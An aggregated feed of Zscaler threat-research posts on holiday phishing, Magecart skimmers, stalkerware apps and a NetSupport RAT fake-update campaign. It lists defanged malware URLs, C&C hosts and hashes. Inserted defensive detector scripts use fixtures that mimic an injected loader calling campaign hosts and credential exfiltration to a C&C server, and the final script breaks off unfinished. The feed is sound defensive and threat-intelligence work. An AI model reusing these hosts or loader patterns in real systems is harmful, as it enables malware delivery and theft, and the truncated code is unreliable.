Security Posts

E-mail from Agent Tesla
Categories: Security Posts

A Big Day for Phishing

Zscaler Research - 1 hour 14 mins ago
We hope you enjoyed your own Black Friday and found everything you wanted as you were shopping the sales. The threat actors certainly attempted to take advantage of the zeal of holiday shoppers. As a follow-up to our previous blog on shopping scams, we’d like to show some of the other attacks we saw during the Thanksgiving break. We’ll highlight a few more phishing tactics commonly used, a Magecart POS skimmer attack on a major brand, and further evidence of Emotet’s prevalence in the overall threat landscape.

The primary motivation of attackers is to take advantage of the online shopping season. Sales are already up for most retailers as consumers snap up deals.

Fig 1: Shopping trends continued to rise through November (the spike at the end is Cyber Monday)

Scams and phishing attempts continue at a steady pace into the holiday shopping season. Attackers know that they can cast a wide net of branded phishing attacks, gift card scams, and malicious files to boost their profitability every year.

Fig 2: Phishing attempts rose during the week before Thanksgiving and Black Friday

Magecart

Magecart has been quite active so far. We have observed consistent hits in the weeks leading up to the holiday season, and they persist. The chart below shows that Magecart infections are proving to be quite a sustainable means for attackers.

Fig 3: Magecart activity tracked over two months (Oct-Nov 2019)

Recently, threat actors targeted the Macy's website. Macy's released a “Notice Of Data Breach” on November 14, 2019. The company stated that the site was compromised by attackers on October 7, 2019. The attackers had inserted an obfuscated version of a Magecart script into the Macy's Checkout and My Wallet pages. According to the breach notice, attackers were able to capture user credit card data. The user-submitted details were exfiltrated to a command-and-control (C&C) server at barn-x[.]com.
Phishing

As we reported in the previous blog, Amazon has been heavily targeted this season, but it isn’t the only brand under attack. All major brands are considered fair game to threat actors. This season, Apple has become a focus of attackers. Below is one such case.

Fig 4: Fake Apple login page

One of the first things you should do before logging into sensitive websites is to check the address bar to ensure you are in the correct place. If you are unfortunate enough to enter your Apple ID into this portal, your information will be sent to the attackers.

Fig 5: Information is sent in clear text to the attackers, as well as to any other attackers currently performing a man-in-the-middle (MitM) attack

After a phishing attack is successful, users get redirected to a message about their account being locked.

Fig 6: After entering Apple login information, the user receives a message from the attacker saying the account has been locked

Black Friday Phishing

Black Friday offers aren’t just big in the U.S.—the start of the shopping season is celebrated all around the world. The image below shows a phishing page claiming to offer Black Friday deals from Americanas.com.br, a major Brazilian retail chain. Notice the domain: the entire content is hosted on Joomla. A legitimate vendor would never host its products via a content management/publishing framework.

Fig 7: Faked Americanas site being hosted on Joomla

The screen below is another example of threat actors targeting users via a fake Americanas.com.br site. As of the writing of this blog, the domain hosting this page was only five days old.

Fig 8: Faked Americanas site on a newly registered domain

Emotet

In our previous blog, we discussed how webmail was a critical element in Emotet infection downloads. Another attack vector favored by threat actors is leveraging compromised WordPress sites—specifically, SSL-secured WordPress sites. Attackers assume (correctly, in many cases) that consumers don’t have a security solution that inspects encrypted traffic (HTTPS). In fact, when you look at the last 1,000 confirmed Emotet samples on URLhaus, 475 of them at the time of this research were using HTTPS to infect users.

Fig 9: HTTPS is the primary method of infection

Conclusion

The Zscaler ThreatLabZ team will continue to track and block various campaigns and tools used by threat actors. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves, particularly during the shopping season, by reviewing our security checklist:

- Change your passwords for critical and important accounts
- Enable two-factor authentication, or “2FA”
- Ensure HTTPS is inspected by your security solution; check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites
- Be vigilant about invoices/orders arriving in email; do not forward such attachments to anyone and be sure to follow IT protocol
- Be wary of tracking number links in emails from shipping/courier companies, as they may direct you to malicious sites
- Do not click on any links from unrecognized senders; even if you do not follow through, the action of clicking the URL is a beacon for the attacker
- Do not provide any credentials via Google Docs; legitimate vendors do not ask for credentials via this medium
- Avoid using public or unsecured Wi-Fi connections for shopping
- Review helpful instructions by the Federal Trade Commission (FTC) on Identity Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware
- Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message
- Report incidents to the FTC
Categories: Security Posts

A New Wave of Stalkerware Apps

Zscaler Research - 1 hour 14 mins ago
Recently, the U.S. Department of Homeland Security (DHS) released an article warning mobile users about the increasing use of spyware apps. The US-CERT (Computer Emergency Response Team) issued the following statement:

The statement was released just after the Federal Trade Commission (FTC) marked its first case against stalking apps (also known as stalkerware or spyware apps). A case was filed against a company that developed and distributed stalking apps that could track smartphone activities like call history, text messages, photos, locations, browser history, and more. These apps were marketed as apps for monitoring the location and activities of children, employees, or spouses. According to the FTC's complaint, the company did not take steps to ensure that purchasers were using the apps for legitimate purposes.

During the timeframe when the US-CERT released its statement, we noticed some hits on the Zscaler cloud in relation to spyware activities. We frequently detect the presence of spyware apps such as Spymie, TruthSpy, iSpyoo, GuestSpy, Spynote, NeoSpy, among others, on the Zscaler cloud, but we also found some new actors in this period. In this blog, we will briefly discuss these new spyware apps.

The blog is divided into three parts. First, we discuss typical stalkerware functionalities, then we'll explore some of the different types of spyware apps we've seen in the last few months, and in the final part we'll cover the indicators of compromise (IOCs).

Stalkerware (stalking apps or spyware), as the name suggests, is a type of app that spies on victims. Stalkerware apps are capable of, but not limited to, performing the following functions:

- Stealing contacts
- Spying on text messages
- Stealing photos
- Spying on browsing history
- Spying on banking apps
- Stealing GPS locations

Normally, one is required to have physical access to a mobile device in order to install spyware apps, but an attacker can use social engineering tactics to get the victim to install spyware. Once installed, the typical spyware app will gain admin-level access, hide itself, spy on the victim, and, finally, send the stolen data to the attacker.

The following is a brief overview of some spyware apps we found on the Zscaler cloud.

Android Monitors

Package Name: com.ibm.fb
Hash: 97c6c8b961d57d4ebad47f5c63ec6446

We saw multiple entries of spyware apps dubbed Android Monitors. Upon looking at the icon, we believe it is in its development phase. Once installed, it cleverly safeguards itself from Google's security framework, Play Protect.

Fig 1: Android Monitor initial setup

The screenshot below shows the functionality of the app's keylogger. If enabled, this app can spy on everything that the victim types, which can include personal WhatsApp messages, Facebook chats, emails, banking activities, and much more.

Fig 2: Android Monitor keylogging

The above screenshot also has an email ID column to which all the stolen data is sent. The Zscaler analytical system precisely detects this spyware. The following screenshot highlights the main functionalities of the app.

Fig 3: Zscaler Cloud Sandbox with Android Monitor sample

Russ City

Package Name: city.russ.alltrackercorp
Hash: 3b388138584ad3168e745097d5aa4206

This spyware app portrays itself as Thief Tracker. Further hunting for similar samples from the same source, we found two more apps, named System Info and System Updater. Upon analysis, we noticed that all three apps were the same; their only difference was their names.
The screenshot below shows how the three spyware apps appeared upon installation:

Fig 4: Spyware app icons

The complete functionality of this spyware can be seen in its manifest file, below.

Fig 5: AndroidManifest.xml

This app performs various background services:

- Read text messages
- Get browser history
- Fetch call logs
- Get GPS location
- Get clicked photos
- Record audio
- Record voice calls
- Capture screenshots

Fig 6: Android services

Spy Phone App

Package Name: com.spappm_mondow.alarm
Hash: 001209b1e2760f88f2bb4b68f159a473

This app was delivered via Google Drive and contained almost all possible spyware functionalities, as shown in the screenshot below:

Fig 7: Zscaler Sandbox displaying Spy Phone analysis

We found its platform online, where the attacker can log in and check all the stolen data stored in this one place.

Fig 8: Spy Phone App control panel

Wi-Fi Settings

Package Name: com.wifiset.service
Hash: 8dab7a558f91e72e3edae8e20ee55c86

This stalkerware portrays itself as a settings app for Wi-Fi. One unique feature of this app is its method for staying persistent. During the installation process, it installs an additional app named Update Settings. The screenshot below shows this functionality in action.

Fig 9: Initial installation steps

Once the initial setup is done, the attacker can enter his/her credentials and leave the rest to the spyware. As soon as the spyware gets an internet connection, it starts sending the stolen data to a command & control (C&C) center/server.

We noticed a major flaw with this spyware. It sends all the stolen data over plain text (HTTP), which exposes the victim's data a second time, to anyone who can observe the traffic. As shown in the following screenshot, the user credentials are sent in plain text:

Fig 10: Plain text communication

The screenshot below shows stolen photos being uploaded to the C&C server with basic Base64 encoding.

Fig 11: Spyware uploading photos from the victim's device

Data Controller

Package Name: lookOut.Secure
Hash: 33dcfd84589c6ccf00fa5a302cefd0fe

This app portrays itself as Data Controller and has the package name lookout.Secure. It is strange to see a package called Lookout, as a legitimate company called Lookout is a highly regarded mobile security company. The attacker might have used this package name in order to trick users into trusting the app. Once installed, it asks for the purpose of use and whether the attacker wants to keep it hidden from the victim or not. (Spyware always prefers to hide itself to evade detection.)

Fig 12: Initial installation steps

The Zscaler Cloud Sandbox report shows the major spying capabilities in this spyware:

Fig 13: Sandbox report of the Data Controller app

Auto Forward

Package Name: com.autoforward.monitor
Hash: 66dbd2d7614555440b657ae24527034a

It's common for spyware apps to portray themselves as parental-control apps. This is the case with Auto Forward spyware. As soon as the spyware is installed, it displays itself as an app named Device. It asks for all available permissions necessary to spy, as shown in the screenshot below:

Fig 14: Initial installation steps

On its official website, Auto Forward assures users that the spyware works on both Android and iOS platforms. Once installed, it steals the personal data of the victim and forwards it to its server, where the attacker can easily view stolen data such as text messages, WhatsApp activities, GPS locations, photos, a list of installed apps, and so on.

Conclusion

Spyware apps often portray themselves as parental-control apps or apps that can monitor employee whereabouts or the activities of a spouse suspected of cheating. Although there are legitimate uses, such as parents monitoring their children's location, these types of apps are often used maliciously.

Most of the spyware in this report was not properly designed. It stores stolen data on a server without any security, which creates a single point of failure. Worse, a single instance of compromise can leak every victim's data into the wild. Secondly, we observed the stolen data being transferred to C&C servers over plain-text channels, which can be compromised by man-in-the-middle attacks. These flaws would not be acceptable in any legitimate app because they threaten the privacy of the users, potentially revealing their personally identifiable information (PII), which is obviously not a concern to the attackers.

Smartphone users who suspect their privacy may have been compromised by such apps can consider following these steps:

- Use a legitimate antivirus app that is regularly updated
- Try factory-resetting your device
- Remove suspicious apps from the device administrator list (Settings --> Security --> Device administrators)

Zscaler customers are protected from stalkerware apps.

IOCs

Hashes:
97c6c8b961d57d4ebad47f5c63ec6446
b0e68b66a5ba47612f2a6a33b343503b
93e969ea1118a9d00be7f1c74b50fce9
b44a98af29b021ad5df4ac6cc38fecf5
d4ecbf666d17326deab49f75588e08b3
9eaf38020f898073af1a3ce34226c91f
ea1546f34a6cd517dcfec07861b7fb4f
5fbb1b497c5a86815e5e8cc092d09af0
10322c7dea57269d69a85699e0357f5f
3b388138584ad3168e745097d5aa4206
369a17a8e1031101f41cc31caac56b9c
ba63ae94bdec93abc144f3b628d151ad
8dab7a558f91e72e3edae8e20ee55c86
001209b1e2760f88f2bb4b68f159a473
33dcfd84589c6ccf00fa5a302cefd0fe
66dbd2d7614555440b657ae24527034a

URLs:
russ[.]city/apks/alltracker_thief_v.6.5.2.apk
russ[.]city/apks/systeminfo_v.6.5.2.apk
russ[.]city/apks/systemupdater_v.6.5.2.apk
206.41.116[.]121
dwn[.]vys.me
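As an added example, not the post's own tooling, the detector below checks proxy log records for the two weaknesses the post describes in the Wi-Fi Settings spyware: credentials submitted in clear text and Base64 bulk uploads over plain HTTP. The log line layout and field names are assumptions, and the sample records are constructed; the C&C hosts come from the post's IOC list.

```python
"""Flag plain-HTTP stalkerware exfiltration in proxy log records (added example).

Constructed record layout (an assumption, one record per line):
    timestamp  method  url  content-type  body
Hosts are the ones in the post's IOC list, re-fanged for matching.
"""
import base64
import re
from urllib.parse import parse_qs, urlparse

IOC_HOSTS = {h.replace("[.]", ".") for h in ("206.41.116[.]121", "dwn[.]vys.me")}
CRED_KEYS = {"user", "username", "email", "pass", "password", "pwd"}
# A long run of Base64 alphabet with at most two '=' pad characters.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")


def looks_base64(blob):
    """True if the body is long, uses only the Base64 alphabet and decodes cleanly."""
    blob = blob.strip()
    if not B64_RE.match(blob) or len(blob) % 4:
        return False
    try:
        base64.b64decode(blob, validate=True)
        return True
    except ValueError:          # binascii.Error is a ValueError subclass
        return False


def parse_record(line):
    """Split one constructed log line into its fields; the body may be empty."""
    parts = line.split(None, 4)
    ts, method, url, ctype = parts[:4]
    body = parts[4] if len(parts) > 4 else ""
    return {"ts": ts, "method": method, "url": url, "ctype": ctype, "body": body}


def inspect(rec):
    """Return the reasons one record looks like clear-text spyware exfiltration."""
    u = urlparse(rec["url"])
    reasons = []
    if u.scheme != "http":
        return reasons          # only unencrypted transport is in scope here
    host = (u.hostname or "").lower()
    if host in IOC_HOSTS:
        reasons.append(f"known stalkerware C&C host {host}")
    if rec["method"] == "POST" and "x-www-form-urlencoded" in rec["ctype"]:
        fields = parse_qs(rec["body"])
        hit = sorted(k for k in fields if k.lower() in CRED_KEYS)
        if hit:
            reasons.append("credentials in clear text: " + ",".join(hit))
    if rec["method"] == "POST" and looks_base64(rec["body"]):
        reasons.append(f"Base64 upload of {len(rec['body'])} chars over HTTP")
    return reasons


def scan(lines):
    """Return (timestamp, url, reasons) for every record that trips a check."""
    out = []
    for line in lines:
        rec = parse_record(line)
        reasons = inspect(rec)
        if reasons:
            out.append((rec["ts"], rec["url"], reasons))
    return out


# Constructed sample traffic: a fake JPEG header padded out, Base64-encoded as
# the post shows for photo uploads, plus a clear-text login and benign noise.
PHOTO = base64.b64encode(b"\xff\xd8\xff\xe0" + b"\x00" * 80).decode()
SAMPLE_LOG = [
    "2019-11-20T10:01:02Z POST http://206.41.116.121/api/login.php "
    "application/x-www-form-urlencoded email=victim%40example.com&password=hunter2",
    "2019-11-20T10:01:09Z POST http://dwn.vys.me/upload.php application/octet-stream " + PHOTO,
    "2019-11-20T10:02:00Z POST https://accounts.example.com/login "
    "application/x-www-form-urlencoded username=alice&password=secret",
    "2019-11-20T10:03:00Z GET http://weather.example.org/today text/html",
]

if __name__ == "__main__":
    for ts, url, reasons in scan(SAMPLE_LOG):
        print(ts, url, "; ".join(reasons))
```

The HTTPS login on the third line is deliberately left alone: the check is about transport, so a proper TLS submission is not a finding even though it carries a password.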
Categories: Security Posts

Scamming and Smishing while Shopping

Zscaler Research - 1 hour 14 mins ago
A few weeks ago, the witches and skeletons that decorated shop windows for Halloween were swept aside and replaced with reindeer and jolly elves. Fir trees supplanted the pumpkins and “Jingle Bells” began drifting from speakers buried under mounds of artificial snow. It all means one thing: the start of the holiday shopping season, which kicks into high gear on Black Friday.

Cyber Monday, which began in 2005, has surpassed Black Friday as the biggest shopping day of the year and, not surprisingly, it has become a major target for cybercrime. But in a report our ThreatLabZ researchers did last year, we were somewhat surprised to see the shifting volumes of activity, which spiked a week before Cyber Monday and dropped off significantly on the day itself. We saw this as an example of the increasing sophistication of attack campaigns, as those carrying them out had begun to mirror the strategies of retail marketers.

The Zscaler cloud processes about 75 billion transactions a day for our enterprise customers, and though the bulk of the traffic is business-related, the sheer volume gives us a sweeping view of activity across the internet. Since the beginning of November, we have seen a marked increase in what we identify as shopping traffic. We are also seeing activity that could foreshadow a busy holiday season for cybercriminals. This activity includes phishing that’s targeting well-known shopping brands, phishing attacks targeting mobile phones, site skimmers looking to harvest credentials from compromised e-stores, scam sites offering gift cards, and banking Trojans trying to turn your PC or mobile device into an ATM.

Figure 1: Shopping traffic on the Zscaler cloud between Oct. 21 and Nov. 17, 2019, averaging nearly 600 million transactions per weekday

Phishing activity tends to rise when the shopping season begins, as attackers know that shoppers may be more likely to respond to “special offers” or notifications relating to shipping and similar matters. Threat actors adjust their phishing kits accordingly, sometimes with seasonal messages and designs. We calculated an increase of more than 400 percent in phishing activity between the first 14 days of October and the first 13 days of November.

Figure 2: Phishing activity between Oct. 2 and Oct. 14, 2019

Figure 3: Phishing activity between Nov. 2 and Nov. 14, 2019

Three cases of phishing attacks on shoppers

Because Amazon is by far the busiest shopping site, it has the highest likelihood of being on the radar of scammers looking to attack a broad audience. Below, we'll discuss some of the ways that attackers are leveraging Amazon’s popularity for their own money-making schemes.

Case 1: Fake Amazon Gift Cards

Everyone loves giving and receiving gift cards, but the phony versions being generated by scammers are dangerous. If you were to click the link (as shown below), you would be redirected to a phishing page that will attempt to collect your login credentials. The following scam arrives via email, congratulating the recipient for qualifying to receive a reward for taking an anonymous survey—but, it says, it must be done in five minutes.

Figure 4: Phishing attempt

Figure 4a: HTML of the page shows the attempt to pose as an Amazon Gift Card

Case 2: Fake Amazon Login

A common way that attackers try to compromise your Amazon account is through the use of an email or site posing as a legitimate Amazon site. Be wary of any emails posing as Amazon Customer Service alerts or payment invoices, as these are common hooks attackers will use to appear legitimate and get victims to click their links. ThreatLabZ has been monitoring one campaign that was sending PDF or DOC files to victims in the hopes they would click through and enter their credentials (see the image below).

Figure 5: Letter impersonating Amazon in an attempt to capture user credentials

By clicking the link in the letter, you would be redirected through several URL shorteners before eventually landing on a compromised site hosting an “Amazon” phishing kit. The site was down at the time of this publication, but the screenshot from early on in the campaign shows a near-perfect copy of an Amazon login screen that is set up to steal credentials.

Figure 6: Faked Amazon login screen

Case 3: Emotet Trojan

A popular method that attackers use to target victims is through the use of scam emails or URLs that pretend to be legitimate purchase orders or invoices; these may appear as links or attachments. This has become a common method for distributing one of the most prevalent banking trojans out there, Emotet. The following case actually comes from the site http://phamthaifood[.]com/4ib60l/Amazon/Orders-details/10_19/. Opening this document in a secured environment still asks the user to enable editing to allow the attack to commence.

Figure 7: Allowing active content of suspicious files is not recommended

An analysis of the document in question provides a glimpse into the PowerShell that will execute on the victim's system.

Figure 7a: Malicious PowerShell

The PowerShell mentioned above will download and execute the Emotet trojan. Running this through a dynamic analysis will reveal a malicious attack.

Figure 7b: Threat score of Emotet as identified by Zscaler Cloud Sandbox

Once the document is opened, it will execute encrypted PowerShell commands to install the banking trojan onto the victim’s system. We've written extensively about the resurgence of the Emotet malware in earlier blogs.

PayPal Phishing

In addition to shopping sites, banking and personal finance sites, such as PayPal, become frequent targets during the holidays. PayPal is one of the most accepted secure payment options used by vendors.
Threat actors know this and use it as another primary target for phishing attacks. Some of these attacks are easy to recognize (as shown below) because they are served over non-secure connections using HTTP, which is always a tell-tale sign of a phishing attempt.

Figure 8: Faked PayPal login screen

Some attacks, on the other hand, can be quite elaborate, as shown below. They are served over an HTTPS connection and the interface presents a very good reproduction of the official PayPal site. The domain name (paypal.com.hrmy.mtbank[.]shnpoc[.]net) could easily be missed because many people believe that as long as they see “paypal.com,” the site is legitimate. Particularly when viewed on a mobile device, it would be difficult to see that the URL does not belong to PayPal, but to “shnpoc.net.”

Figure 9: Faked PayPal login screen

The example below appears to be a PayPal site that enables you to sign up for a personal or business account, or even recover your password. But any personal and financial information you enter will be captured by the scammers.

Figure 10: Faked PayPal registration screen

Smishing Campaign

Many consumers are seeing an increase in order and delivery messages on their mobile devices. Scammers use this opportunity to lure users into revealing personal information through SMS phishing (“smishing”) techniques. With smishing, attackers send an SMS message to mobile users containing live links that, when clicked, redirect the user to phishing pages, resulting in credential theft and possibly financial theft. In the example shown below, we saw SMS messages notifying the user of an online order with a link to follow for more details.

Figure 11: Smishing attempt

Once clicked, the user is redirected to cyzoone(.)xyz. This site poses as a poll site to lure victims into entering to win up to $35,000. To take part in the poll, victims have to register using their names.

Figure 12: Smishing attempt using a survey with cash prize

Upon clicking the PARTICIPATE button, the site begins asking poll questions. The questions we observed were about cars, perfumes, and watches, among other things, and can be seen in the following screenshots.

Figure 13: Smishing attempt using a survey with cash prize

Once finished with the poll questions, the screen shows the amount that the victim has “won.” Now that the user is fully invested in this deception, the scam starts. The attacker claims that, due to payment system limits, the payment will be sent in two parts. But, to get that amount in full, the user has to pay $35, as shown in the following screenshot.

Figure 14: Scam message saying if you pay $35, you will receive $26,600

Upon clicking the payment button, the scam redirects to a payment page hosted on paybank(.)expert asking the user for a credit card number, CVV number, and the expiration date of the card.

Figure 15: Payment screen as part of a smishing scam

After filling out the form and clicking the Pay Now button, the payment information will be sent to the attacker’s site, as shown in the screenshot below. This gives the attackers access to the victim’s account.

Figure 16: Scammer’s site

We also checked the stats of the bit.ly link included in the original SMS message and observed that there were more than half a million clicks on this link in a 24-hour period, which shows the widespread reach of this scam.

Figure 17: Clicks on the scammer’s original smishing message

Magecart: Site skimmer

Magecart has been active for five years and has been successful at injecting JavaScript into target websites to skim payment information from point-of-sale portals. The injected script can be loaded directly onto the target page or loaded from a remote resource controlled by the attacker. The attack script may be injected in plain text (as shown below) or obfuscated to avoid detection.

Figure 18: E-commerce site compromised by Magecart

Magecart malware is capable of tracking cookies to check what data is stored and what data is sent. It also checks the validity of the payment details entered by a user. If the payment details are valid, the malware proceeds to send the information to the attacker. This attack is smart enough to check for old card details and sends only new information to the attacker. For more detailed insight into the mechanics of Magecart, please check out our analysis here.

Figure 19: Magecart skimmer

Conclusion

The ThreatLabZ team at Zscaler will continue to track and block various campaigns and tools used by threat actors to target users. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves by reviewing our security checklist, particularly during the shopping season:

- Verify the authenticity of the URL or website before accessing it. Be wary of links with typos.
- Check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites. All legitimate vendors/retailers and payment portals use HTTPS connections for their transactions.
- Enable two-factor authentication, or “2FA,” to provide an additional layer of security, especially for sensitive accounts related to financial transactions.
- As a rule of thumb, don't click links or open documents from unknown parties who promise exciting offers and opportunities.
- Avoid visiting URL shortener links.
- Always ensure that your operating system and web browser are up to date and have the latest security patches installed.
- Use a browser add-on, such as Adblock Plus, to block malvertising (compromised/malicious websites bombard visitors with pop-up ads).
- Only download apps from official app stores, such as Google or Apple.
- Avoid using public or unsecured Wi-Fi connections for shopping.
- Back up your documents and media files. You can always go the extra mile by encrypting your files.
- Review helpful instructions by the Federal Trade Commission (FTC) on Identity Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware.
- Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message.
- Report incidents to the FTC.
Categories: Security Posts

NetSupport RAT installed via fake update notices

Zscaler Research - 1 hour 14 mins ago
Recently, the Zscaler ThreatLabZ team came across two campaigns designed to trick users into downloading a Remote Access Trojan (RAT) via a fake Flash Player update and a fake font update. These campaigns inject malicious redirector scripts into compromised content management system (CMS) sites. These sites use popular programs, such as WordPress, Joomla, Drupal, and others, and are being attacked as a result of vulnerabilities introduced by plugins, themes, and extensions, something we’ve discussed previously on this blog. The two malware campaigns we examine in this blog deliver a payload designed to steal sensitive information.

The following figure depicts the hits on the various compromised sites. Overall, Zscaler has blocked nearly 40,000 of these attempts in the past three months.

Figure 1: The number of hits on the various types of compromised CMS sites: WordPress (green), Joomla (gold), Drupal (blue), and other CMS sites (orange)

Method 1: Fake Flash Player update campaign

In this attack, cybercriminals hacked WordPress sites using the theme plugin vulnerability and injected two malicious redirect scripts into the compromised site. Using either one of the scripts, the attackers will deploy malware at the user’s end. The injected script will redirect to the malware site and download the fake update template script to show a fake Flash Player update alert to the user over the compromised site.

Figure 2: A compromised WordPress site with the fake Flash Player update page

The following figure shows the source code of the compromised website with the injected scripts.

Figure 3: The injected redirector scripts in a compromised CMS site

The first injected script will direct the user to click.clickanalytics208[.]com to download the fake update template. If it fails to meet the attacker's checkpoints, such as geolocation and network settings, then it will execute the next injected script.

Figure 4: The first injected malicious script redirects to the click.clickanalytics208[.]com site

The second injected script will redirect to the chrom-update[.]online site and will download the fake update template script from the malicious site.

Figure 5: The second injected malicious script redirects to the chrom-update[.]online site

The attacker will send the template.js file as a layer over the compromised site with a fake update page. Which fake update page template is displayed depends on the value of a particular variable, called the “banner.”

Figure 6: The default template.js code [banner value = 1: browser update; 2: font; 3: Flash]

The fake template page will display an alert to try to trick the user into starting the update. Once the user clicks the "Update" button, the script downloads the malicious HTA file from the specified URL.

Figure 7: A fake Flash Player update page with the link to download the malicious HTA file

If the user clicks the "Later" button, the redirect still occurs, taking the user to the same page to download the malicious HTA file. The following figure depicts the source code of template.js with the link to download the malicious HTA file with the banner value 3.

Figure 8: The source code of the template.js script from the redirection URL (chrom-update[.]online)

Once the user runs the HTA file, it will also run PowerShell via the command prompt and download the RAT payload from the specified URL.
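One way to triage a suspected site for the injected loaders described above, as an added example that is not part of the Zscaler post: the scanner below walks a page's script tags and flags scripts served from the campaign hosts in the post's IOC list, a third-party template.js, the banner variable (1/2/3 as in Figure 6), and any inline reference to an .hta download. The HTML samples are constructed and the site's own hostname is an assumption.

```python
"""Scan page HTML for the injected fake-update loader pattern (added example).

Indicators are the ones the post names; the sample pages are constructed and
the attribute/variable names inside them are guesses at what a loader looks like.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts from the post's IOC list, defanged there and re-fanged here.
IOC_DOMAINS = {d.replace("[.]", ".") for d in (
    "click.clickanalytics208[.]com", "chrom-update[.]online",
    "asasasqwqq[.]xyz", "sygicstyle[.]xyz", "sreex[.]info",
)}
# Banner values documented in Figure 6 of the post.
BANNER_LURES = {"1": "browser update", "2": "font update", "3": "Flash Player update"}
BANNER_RE = re.compile(r"\bbanner\s*=\s*['\"]?([123])['\"]?")


class _Scripts(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None            # list while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def scan_page(html, page_host):
    """Return (severity, reason) findings; page_host is the site's own hostname."""
    p = _Scripts()
    p.feed(html)
    p.close()
    findings = []
    for src in p.external:
        u = urlparse(src)
        host = (u.hostname or "").lower()
        if host in IOC_DOMAINS:
            findings.append(("high", f"external script from campaign host {host}"))
        elif u.path.lower().endswith("template.js") and host and host != page_host:
            findings.append(("medium", f"third-party template.js loaded from {host}"))
    for body in p.inline:
        for host in sorted(IOC_DOMAINS):
            if host in body:
                findings.append(("high", f"inline script references campaign host {host}"))
        m = BANNER_RE.search(body)
        if m:
            lure = BANNER_LURES[m.group(1)]
            findings.append(("medium", f"fake-update template banner {m.group(1)} ({lure})"))
        if re.search(r"\.hta\b", body, re.IGNORECASE):
            findings.append(("high", "inline script points at an .hta download"))
    return findings


# Constructed sample: the two injected loaders the post describes (Figure 3).
COMPROMISED_PAGE = """<html><head><title>Shop blog</title>
<script src="https://click.clickanalytics208.com/loader.js"></script>
<script>
var banner = 3;
var s = document.createElement("script");
s.src = "https://chrom-update.online/template.js";
document.head.appendChild(s);
</script>
</head><body><p>Welcome</p></body></html>"""

# Constructed sample of a clean page for comparison.
CLEAN_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script>console.log("hello");</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for sev, why in scan_page(COMPROMISED_PAGE, "shop.example"):
        print(sev, why)
```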
Figure 9: The source code of the downloaded malicious HTA file   Figure 10: The obfuscated content responsible for the malware download   Figure 11: The deobfuscated code showing the download link   Figure 12: Step 1 of the malware payload installation process   Figure 13: Step 2 of the malware payload installation process   Figure 14: The NetSupport RAT malware running as a client-side application   Finally, the installed RAT malware will send the victim's information in an encrypted format to the attacker’s site (hxxp://179.43.146[.]90/fakeurl.htm) to enable remote access of the victim’s machine, as shown in Figure 15 below. Figure 15: The captured user data is transferred to the attacker’s site in an encrypted format Figure 16: The overall traffic of the fake Flash Player update malware campaign   The attackers were also tracking the visitor count, as shown in Figure 17 below. So far, 113,000 unique users were affected by this malware attack. Figure 17: The affected user count   Method 2: Fake font update campaign In this attack, the cybercriminals will directly inject the fake update template script by exploiting the legitimate site to evade detection. As mentioned earlier, the template script logic will identify which browser is being used. While accessing the compromised site via Chrome, the user will receive an alert that the “PT Sans” font wasn’t found.   Figure 18: The compromised site with a fake font update page (Chrome)   The same site was accessed via Firefox and shows the same alert to the user in the Firefox template. Figure 19: A compromised site with a fake font update page (Firefox)   The following image shows the source code of the compromised site with the injected template script.   Figure 20: The template.js is injected directly into the compromised site   The source code of the template.js script shows a banner value “2” and has a link (sreex[.]info/update.exe) to download the malware payload. 
Figure 21: The source code of the template.js script with the malware download link

Figure 22: After clicking the update button, the malware payload is downloaded (via update.exe)

The following activities were observed while executing the downloaded Trojan.

Figure 23: The program created a process "gdsun.exe" from the malware payload (a self-copy of the payload)

Figure 24: The malware creates a copy of the payload in the %ProgramData%/ folder

Figure 25: It also creates a startup registry entry for the dropped malware

It posts the collected user data to clickies(.)site/CC/index(.)php, which is operated by the attackers.

Figure 26: Post-infection callback traffic

Figure 27: The overall traffic of the fake font update campaign

Conclusion

In today's digital world, a company's website is its most valuable asset. Therefore, it is critically important for companies to protect this public face from an attack that could put their business, employees, and customers at risk. Zscaler has blocked more than 40,000 malicious attacks related to this campaign in the past three months.

Figure 28: The Zscaler Risk Analyzer score for the malware payload download URL

IOCs

URLs:
click.clickanalytics208(.)com
chrom-update(.)online
asasasqwqq(.)xyz
bitbucket(.)org/execuseme1/1312/downloads/download.hta
xyxyxyxyxy(.)xyz/wwwwqwe/11223344.exe
179(.)43(.)146(.)90/fakeurl(.)htm
sygicstyle(.)xyz
sreex(.)info/update(.)exe
clickies(.)site/CC/index(.)php

Malware payload (SHA256):
5ad69da64dacdf87c5bdea12a20ca8fd4d34e6a16c37dfbb9a2af8df79901504 (download.hta)
9c69a1d81133bc9d87f28856245fbd95bd0853a3cfd92dc3ed485b395e5f1ba0 (11223344.exe)
ea137c0079624de8d2f8b174d44f90faa58c4eda558f7d5db0efa742f36c2cdf (update.exe)
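The IOC list above is only useful once it is matched against traffic. The script below is an added example (not Zscaler's tooling) that takes the defanged indicators exactly as published, refangs them, and scans proxy log lines for hits; the log lines, client IPs and the www.example.com entry are constructed. The bitbucket(.)org entry shows why path-bearing IOCs must match on path as well as host: the host is legitimate and only that download path is malicious.

```python
"""Match proxy-log URLs against the fake-update campaign IOCs listed above.

Added example, not Zscaler's tooling. The IOC strings are the defanged values
published in the post; the log lines and client IPs below are constructed.
"""
import hashlib
from urllib.parse import urlparse

# URL/host IOCs from the post, kept in their defanged form.
IOC_URLS = [
    "click.clickanalytics208(.)com",
    "chrom-update(.)online",
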